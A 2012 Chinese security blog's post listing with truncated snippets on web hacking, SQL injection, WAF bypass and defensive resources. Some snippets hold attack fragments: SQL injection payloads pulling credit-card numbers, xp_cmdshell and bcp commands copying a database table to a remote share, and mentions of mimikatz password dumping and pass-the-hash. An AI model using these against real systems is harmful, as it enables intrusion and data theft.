- 博客(89)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 Security Operations Maturity Architecture (SOMA)
http://www.isecom.org/research/soma.html
2012-02-29 20:44:28
726
转载 Faster Blind MySQL Injection Using Bit Shifting
http://www.exploit-db.com/papers/17073/Faster Blind MySQL Injection Using Bit Shifting#### http://h.ackack.net/faster-blind-mysql-injection-using-bit-shifting.html for a HTML version# M
2012-02-29 10:51:14
695
转载 Bypassing Web Application Firewalls with SQLMap Tamper Scripts
http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMapWeb Application Firewalls have become the new security solution for several businesses. Many companies often ignore the actual vulnerabilitie
2012-02-29 10:46:23
1170
转载 Syhunt: Google V8 - Server-Side JS Injection in vulnerable web apps
http://seclists.org/fulldisclosure/2012/Feb/409Google V8 Server-Side JavaScript Injection joins the set of web application security vulnerabilitiesTIME-BASED PHP V8JS INJECTION & NOSQL/SSJS INJ
2012-02-29 10:39:41
1077
原创 亚马逊不错的书籍
1.http://www.amazon.com/Qualities-Highly-Secure-Software/dp/1439814465/ref=sr_1_111?s=books&ie=UTF8&qid=1330409500&sr=1-1112.http://www.amazon.com/Threats-Countermeasures-Advances-Information-Se
2012-02-28 14:14:07
1218
原创 mysql高级渗透经验
concat(0x7C, hex(cc_number), 0x7C)concat(0x7C, ord(substring('11',1,1)), 0x7C)concat(0x7C,hex(cc_number),0x7C)concat(0x7C, ord(substring(cc_number,3,1)), 0x7C)加where条件and(select%20ord(substr
2012-02-25 22:49:22
1693
转载 Mysql 另类盲注中的一些技巧
http://www.oldjun.com/blog/index.php/archives/62/# oldjun注:帮朋友打下广告,新书上市。官方连接:http://hi.baidu.com/%D3%C7%D3%F4%B5%C4%BA%DA%D3%A5/blog/item/c46335d2f291df0c3bf3cf07.html书名:《黑客攻击实战入门》 作者:BlAck.Eagl
2012-02-24 23:52:26
928
原创 itil证书查询
https://mylogin.exin.nl/Portal/polarserver.asp?Screen=FrameSet&SID=623C84F6A43AEABC&PageID=151902
2012-02-24 12:19:26
9721
转载 SAP NetWeaver Internet Sales - local file read
SAP NetWeaver 7.0 Internet Sales (crm.b2b) has local file read vulnerability.Digital Security Research Group [DSecRG] Advisory ВDSECRG-12-012 (Internal DSecRG-00201)Application: SAP NetWeave
2012-02-24 09:24:44
859
转载 vsftpd cmds_allowed 权限控制
vsftpd cmds_allowedcmds_allowed=ABOR,CWD,LIST,MDTM,MKD,NLST,PASS,PASV,PORT,PWD,QUIT,RETR,RMD,RNFR,RNTO,SITE,SIZE,STOR,TYPE,USER,ACCT,APPE,CDUP,HELP,MODE,NOOP,REIN,STAT,STOU,STRU,SYST注意:一定不
2012-02-24 09:20:53
2032
转载 CSRF with upload – XHR-L2, HTML5 and Cookie replay
XHR level 2 calls embedded in HTML5 browser can open a cross domain socket and deliver HTTP request. Cross Domain call needs to abide by CORS. Browser will generate preflight requests to check policy
2012-02-24 09:14:18
1246
转载 Website Insecurity: This grinds my gears....
This document reflects my personal opinion on the state of application security. It calls out what I see are the weaknesses of our approach as a community to addressing the issue of web [in]security.
2012-02-24 09:07:52
3047
1
转载 Top Ten Web Hacking Techniques of 2011
Every year the Web security community produces a stunning amount of new hacking techniques published in various white papers, blog posts, magazine articles, mailing list emails, etc. Within the thousa
2012-02-24 09:05:47
856
转载 Session Management Cheat Sheet
https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
2012-02-24 09:04:20
748
转载 intro to chrome addons hacking
http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.htmltldr; Webpages can sometimes interact with Chrome addons and that might be dangerous, more on that later. Meanwhile, a warmup
2012-02-24 08:59:30
841
转载 站库分离拖东西提示
http://pnig0s1992.blog.51cto.com/393390/775440exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.
2012-02-23 16:19:39
755
转载 轻量级调试器神器 - mimikatz
http://hi.baidu.com/hackercasper/blog/item/b080dbd05eb6a5cc562c8461.html 昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下神器下载地址: http://blog.gentilkiwi.com/mimikatz还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态
2012-02-23 16:13:51
2273
1
转载 Mapping an application - Access control testing - Helper tool
https://github.com/arvinddoraiswamy/Threat_Model_Helper
2012-02-21 10:14:10
612
原创 Creating Backdoors Using SQL Injection
http://resources.infosecinstitute.com/backdoor-sql-injection/
2012-02-21 10:10:58
632
转载 RSA 会议
https://ae.rsaconference.com/US12/scheduler/eventcatalog/eventCatalog.do
2012-02-21 10:02:51
598
转载 How to Detect HTTP Parameter Pollution Attacks
http://www.acunetix.com/blog/whitepaper-http-parameter-pollution/Nowadays, many components from web applications are commonly run on the user’s computer (such as Javascript), and not just on the
2012-02-21 09:45:59
1523
转载 关于国内数据库审计系统市场的一点分析--zz from网络游侠
http://www.youxia.org/catalog.asp?tags=Oracle%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AE%A1%E8%AE%A1版权所有:网路游侠网址:http://www.youxia.org直接下载图片:http://www.youxia.org/upload/2008/10/200810221426472034.
2012-02-18 10:59:45
3410
转载 Scenario and Attack Graphs
http://www.cs.cmu.edu/~scenariograph/http://people.cis.ksu.edu/~xou/mulval/http://dspace.mit.edu/handle/1721.1/29899 netspahttp://web.mit.edu/tlo/www/industry/comp_security_tech.html#NetSPA
2012-02-18 09:50:34
1230
原创 capec
attack patterns(CAPEC)Cyber observables(cybOX)Assessment Language(OVAL)Common Weakness Scoring System(CWSS)Common Vulnerabilities and exposures(CVE)
2012-02-18 09:40:54
829
转载 peoplesoft documents
http://www.oracle.com/technetwork/documentation/psftarch-096292.htmlhttp://www.oracle.com/technetwork/documentation/psftent-090284.html
2012-02-16 10:30:08
698
原创 mod_security
There are two main evasion issues to be concerned with for any WAF -1) Evasion of the engine/parsing itselfThese are usually impedance mispatches between the WAF and underlying app. There were som
2012-02-16 09:50:41
725
原创 defcon video
https://www.defcon.org/html/links/dc-archives/dc-18-archive.html
2012-02-16 09:44:46
600
原创 owasp appsec
https://www.owasp.org/index.php/OWASP_AppSec_Research_2010_-_Stockholm,_Sweden
2012-02-16 09:30:05
541
转载 80 of the Best Linux Security Applications
The aim of this article is to provide the user with a starting point for improving the security of a Linux machine. Basic system security (e.g. having a regular backup strategy, using hard-to-guess pa
2012-02-16 00:28:08
1201
转载 Struts 2 Security Vulnerability - Dynamic Method Invocation
IntroductionThe Struts 2 web application framework has a long-standing security vulnerability that may not be well known to new Struts 2 developers. By default the framework enables a technique call
2012-02-15 22:55:10
1638
转载 用bt5下的keimpx.py进行hash注入
http://hi.baidu.com/myvbscript/blog/item/fd16413d24da6cf13c6d973d.html测试目标机器是winxp,ip:192.168.1.5。由于不是域机器,所以事先我关闭了防火墙和使用简单文件共享(打开我的文档->工具->文件夹选项->查看->去掉使用简单文件共享前的√)。运行命令:root@bt:/pentest/passw
2012-02-15 18:00:04
1043
原创 gtalk 加密工具
pidginhttp://www.pidgin.im/pidgin-otrhttp://www.cypherpunks.ca/otr/
2012-02-15 10:58:25
815
转载 Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
This idea occurred to me a few weeks back when discussing the potential impact of ClickJacking attacks withLuca. Submitting forms using ClickJacking is hard work and is only successful in very rare
2012-02-15 10:21:11
805
转载 Top Ten Web Protection Techniques of 2011
http://www.networkworld.com/news/2011/012411-top-web-hacking-techniques.htmlA Web hack that can endanger online banking transactions is ranked the No. 1 new Web hacking technique for 2010 in a
2012-02-15 10:17:04
812
原创 cpanel install
http://docs.cpanel.net/twiki/bin/view/AllDocumentation/InstallationGuide/WebHome
2012-02-14 23:08:26
577
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人